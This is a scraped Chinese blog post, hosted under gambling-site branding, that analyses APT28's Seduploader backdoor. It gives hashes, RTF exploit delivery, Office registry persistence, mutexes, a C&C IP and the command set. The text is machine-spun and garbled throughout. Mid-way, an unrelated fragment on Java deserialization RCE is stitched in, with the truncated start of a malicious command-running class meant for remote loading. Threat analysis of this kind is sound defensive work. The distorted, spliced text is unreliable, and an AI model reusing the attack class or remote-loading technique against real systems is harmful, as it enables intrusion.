APT28剖析之Seduploader样本剖析 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

APT28剖析之Seduploader样本剖析

申博_安全工具 申博 140次浏览 未收录 0个评论

最近在研讨APT进击,我挑选研讨APT的要领经由过程一个APT构造入手,我挑选的是APT28这个构造,APT28构造是一个与俄罗斯当局构造的高等进击团伙,我将剖析该构造的进击样本、进击要领、进击目标来研讨一个APT构造。本次剖析的是该团伙运用的CVE-2015-1641破绽样本,一切材料均来自互联网
Seduploader歹意软件作为APT28的第一阶段后门运用,重要作用是用于侦探并下载第二阶段的木马。

重要的进击体式格局托付这类木马:
1 鱼叉进击(运用垂纶邮件包罗歹意的office文档)
2 水坑进击(运用Sedkit破绽工具包,重要包罗flash跟IE的破绽)

此木马的一些特性:
1 包罗有Carberp开源木马的代码
2 此木马已被编译的有Windows跟OS X版本
3 举行反剖析已分歧版本多种衔接C&C的体式格局

样本剖析
文件的信息以下
文件名称 btecache.dll
SHA-256 c2551c4e6521ac72982cb952503a2e6f016356e02ee31dea36c713141d4f3785
建立时刻 2016-05-20 13:16:01
文件巨细 51.0 KB (52,224 字节)

文件名称 svchost.dll
SHA-256 69940a20ab9abb31a03fcefe6de92a16ed474bbdff3288498851afc12a834261
建立时刻 2016-05-20 22:58:15
文件巨细 32.5 KB (33,280 字节)

托付体式格局
这两个文件是经由过程社工邮件照顾的歹意的rtf文档,rtf文档包罗有CVE-2015-1641破绽

耐久化体式格局
在上篇文章有引见,在HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf中以下所示带有开释的btecache.dll,每次翻开office顺序的时刻,会加载这个DLL,完成木马的耐久化
与Carberp同源性剖析
在剖析着两个DLL中发现了许多跟Carberp开源木马的代码雷同的代码,以下Getkernel32函数,在API猎取函数的体式格局跟RC2密钥都是雷同的
RC2密钥

 

btechche.dll剖析

这个文件会跟着office历程而加载,然则会对照历程,只要word历程才挑选启动,并建立了一个ASLIiasiuqpssuqkl713h互斥体
以后拼接出开释的另一个的DLL文件svchost.dll的途径,而且将一个begin字符串传入,而经由过程剖析svchost.dll发现是这个DLL的导出函数。

APT28剖析之Seduploader样本剖析
以后将本身复制到新拓荒的内存中,并开启线程

java反序列化RCE回显研讨

总结一下常见反序列化RCE回显几种方式如下: a).使用java.net.URLClassLoader类,远程加载自定义类(放在自己服务器上的jar包),可以自定义方法执行。 b).在自定义类中,抛出异常,取得回显结果。 eg:Jboss报错返回命令执行结果。 利用defineClass加载byte[]返回Class对象,不用远程加载恶意类。 直接利用RCE将执行的命令写入服务器文件中,再次访问得到执行命令结果。 1、URLClassLoader加载远程恶意类,抛出异常回显 恶意类如下: import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.Socket;

public class R
{
public R(String commond) throws Exception {
reverseConn(commond);
}

public void reverseConn(String commond) throws Exception {

//执行命令
Process proc = Runtime.getRuntime().exec(commond);
BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
StringBuffer sb = new StringBuffer();
String line;
while ((line = br.readLine()) != null)
{
sb.ap

加载svchost模块
猎取begin地点并实行
Svchost模块剖析
通讯剖析
起首建立互斥量MutexName = “sSbydFdIob6NrhNTJcF89uDqE2”

 

然后建立了一个线程,而且推断主机是不是联网

 
以后,最先衔接google.com,并天生随机途径

 
运用POST协定举行发送,不论返回状况码是200照样404都是会举行到下一步。
以后直连C&C,并网络体系信息举行发送,C&C为191.101.31.6
网络的体系信息并发送
网络的体系信息包罗
体系历程信息如图
参数诠释:
Id:硬盘信息 硬盘序列号
w: 背面跟两个字节
第一个字节:透露表现猎取的操纵体系版本信息
第二个字节:透露表现是32位照样64位
背面跟历程信息

APT28剖析之Seduploader样本剖析
Disk:
经由过程注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Disk\Enum
猎取磁盘信息如图
build=0x7caa0e19
透露表现木马版本的硬编码
另有一些其他的参数,然则此次并没有发送
Inject:透露表现是不是举行注入
末了经由过程自定义的加密算法举行加密然后发送,发送完以后,推断若是状况码是200或许404透露表现C&C存活,

在发送完毕后,若是设置标记位(此样本没有设置),将会将C&C 191.101.31.6 BASE64编码后设置到以下注册表中
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Servers\Domain
功能剖析
在吸收数据以后举行解密后,重要与以下指令举行对照
包罗以下指令,举行文件,实行,设置操纵
[file]
Execte
Delete
[/file]
[settings]
[/settings]

 


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明APT28剖析之Seduploader样本剖析
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址